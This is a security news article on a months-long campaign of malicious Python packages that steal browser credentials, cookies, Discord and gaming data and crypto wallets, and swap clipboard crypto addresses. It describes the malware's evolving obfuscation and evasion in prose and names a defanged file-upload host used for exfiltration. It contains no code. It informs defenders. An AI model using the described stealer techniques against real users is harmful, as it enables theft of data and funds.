A threat actor has been delivering a “relentless campaign” since early April to seed the software supply chain with hundreds of malicious Python packages aimed at stealing sensitive data and cryptocurrency from Windows systems.
The packages, delivered via various usernames on GitHub, have been downloaded nearly 75,000 times already, researchers from Checkmarx revealed in a blog post this week. They also cast a wide net in terms of the info they collect, with the capability to steal data from the target system, various applications and browsers, and even the users themselves.
Further, the campaign has what appears to be a lucrative monetization aspect: It targets cryptocurrency users by modifying crypto addresses to redirect transactions to the attacker, according to Checkmarx. In fact, one of the crypto wallet addresses accepting these transactions showed a six-figure amount during the time period that the malicious packages were active.
“The sheer volume and persistence of these deployments hinted at an attacker with a well-crafted agenda,” Checkmarx security researcher Yehuda Gelb wrote in the post.
Moreover, the attacker has shown a steady evolution in the sophistication of the packages, transitioning from plaintext to encryption to multilayered obfuscation — even secondary disassembly payloads.
“The threat actors’ most recent packages adeptly dismantle system defenses, leaving it exposed and vulnerable,” Gelb wrote.
Multiphase Evolution
The attacker employed a multiphase attack sequence, reflected in the activity of the malicious packages as they evolved since they initially appeared in early April.
In the beginning, the packages, written in plaintext, “were deceptively transparent,” according to Gelb. They “would subtly integrate themselves into unsuspecting systems, all the while laying the groundwork for their malicious endeavors,” he wrote.
Those activities began with a stealthy installation of dependencies and a subprocess that prevented any console window from surfacing to alert users, followed by an ability to sense the environment to cease activity at signs of detection.
Once this initial activity ended, the packages would set about their real task of collecting data from an infected system, extracting sensitive data including usernames, passwords, history, cookies, and payment information from Opera, Chrome, Microsoft Edge, Brave, and Yandex browsers. They also mined data from various apps, including Atomic, Exodus, Steam, and NationsGlory, packaging the data into ZIP files before extracting them.
Other capabilities of the packages during this initial phase included a search of the user’s directories for potentially valuable files and subsequent upload of finds to hxxps[:]//transfer[.]sh; theft of badges, phone numbers, email addresses, and more from Discord as well as from popular gaming platforms such as Minecraft and Roblox; and screenshot-capture to track real-time user activity.
Crypto Heist and Evasive Tactics
The cryptocurrency element was also a hallmark of the first phase of the attacks. Malware spread through the packages would track the user’s clipboard, scanning for cryptocurrency addresses so they could be replaced with the attacker’s own.
“Similar crypto addresses were found across the myriad of malicious packages hinting at a centralized strategy, channeling the redirected funds into a few primary collection points,” Gelb noted.
The packages didn’t stop there, but also would tamper with applications such as Exodus — a crypto wallet management app — to alter its core files to enable “unrestricted data exfiltration,” he wrote.
After the first wave of packages, the attacker added encryption to the plaintext of the malware released in the summer months, making its malicious functionality harder to detect, though at its core the behavior stayed the same.
The most recent packages took these deceptive practices even further, including dozens of layers of obfuscation that would hide secondary payloads fetched from an external source in the code.
Further, additional payloads included in the latest packages significantly extended the data collection and exfiltration capabilities of earlier packages, as well as included further evasion tactics that could prevent users from downloading antivirus software or checking files for viruses.
Attackers also added the ability to steal data from Telegram and pilfer data such as cryptocurrency wallets, system information, antivirus info, task list, Wi-Fi passwords, clipboard data, and specific files from directories like Desktop, Pictures, Documents, Music, Videos, and Downloads directly from the targeted machine, according to the researchers.
Beware Suspicious Packages
Threat actors increasingly are recognizing the value of weaponizing open source packages as a way to target the software supply chain and thus reach an enormous target base with significantly less effort than other types of attacks can require.
Python, given its widespread use in software development, is an especially popular target for attackers, who have even gone so far as to poison entire projects based in the programming language.
Indeed, malware distribution through open source packages is an ongoing threat, one that requires organizations to maintain “constant vigilance and adaptability to effectively protect against it,” Gelb wrote.
The discovery of the recent Python campaign, in which the attacker constantly evolved to evade detection, highlights how important it is both for security professionals to share open source threat intelligence, and for developers to carefully vet any packages they download, particularly when they come from untrusted sources.